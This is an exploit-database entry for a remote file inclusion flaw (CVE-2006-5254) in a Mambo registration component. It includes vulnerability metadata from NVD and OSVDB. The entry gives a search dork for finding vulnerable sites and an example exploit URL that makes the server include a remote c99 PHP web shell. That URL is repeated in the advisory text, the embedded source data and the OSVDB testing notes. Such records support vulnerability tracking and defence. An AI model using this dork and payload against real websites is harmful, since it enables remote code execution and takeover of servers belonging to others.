ID EDB-ID:2379
Type exploitdb
Reporter k1tk4t
Modified 2006-09-16T00:00:00
Description
Mambo com_registration_detailed <= 4.1 Remote File Include. CVE-2006-5254. Webapps exploit for php platform
########################################################################
# Mambo com_registration_detailed <= 4.1 Remote File Inclusion
#
# Download Source : http://mamboxchange.com/projects/regdetailed/
# Dork = allinur:com_extended_registration
#
# Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
# Location: Indonesia
########################################################################
file ;
registration_detailed.inc.php
########################################################################
bugs ;
[at]line 25
include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");
#########################################################################
example exploit ;
http://victim.xxx/ components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
--> ghoz, home_edition2001, iFX, and for all (friend's&enemy)
# milw0rm.com [2006-09-16]
{"id": "EDB-ID:2379", "hash": "a6efac971e540721387d9b3fdb7bda03", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mambo com_registration_detailed <= 4.1 - Remote File Include", "description": "Mambo com_registration_detailed <= 4.1 Remote File Include. CVE-2006-5254. Webapps exploit for php platform", "published": "2006-09-16T00:00:00", "modified": "2006-09-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2379/", "reporter": "k1tk4t", "references": [], "cvelist": ["CVE-2006-5254"], "lastseen": "2016-01-31T16:07:49", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-01-31T16:07:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5254"]}, {"type": "osvdb", "idList": ["OSVDB:36055"]}], "modified": "2016-01-31T16:07:49"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2379/", "sourceData": " ########################################################################\n # Mambo com_registration_detailed <= 4.1 Remote File Inclusion\n # \n # Download Source : http://mamboxchange.com/projects/regdetailed/\n # Dork = allinur:com_extended_registration\n #\n # Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com\n # Location: Indonesia\n\n ########################################################################\n file ;\n registration_detailed.inc.php\n ########################################################################\n bugs ;\n [at]line 25\n\n include_once(\"$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php\");\n #########################################################################\n example exploit ;\n http://victim.xxx/ components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?\n ########################################################################\n Thanks;\n str0ke\n milw0rm\n google\n #e-c-h-o (all member echo community)\n\n #nyubi (all member solpotcrew community)\n --> ghoz, home_edition2001, iFX, and for all (friend's&enemy) \n\n# milw0rm.com [2006-09-16]\n", "osvdbidlist": ["36055"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:34", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in registration_detailed.inc.php in Mark Van Bellen Detailed User Registration (com_registration_detailed), aka regdetailed, 4.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.", "modified": "2017-10-19T01:29:00", "id": "CVE-2006-5254", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5254", "published": "2006-10-12T22:07:00", "title": "CVE-2006-5254", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[victim]/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?\n## References:\nISS X-Force ID: 28982\nGeneric Exploit URL: http://milw0rm.com/exploits/2379\n[CVE-2006-5254](https://vulners.com/cve/CVE-2006-5254)\nBugtraq ID: 20072\n", "modified": "2006-09-16T00:00:00", "published": "2006-09-16T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36055", "id": "OSVDB:36055", "title": "regdetailed registration_detailed.inc.php mosConfig_absolute_path", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
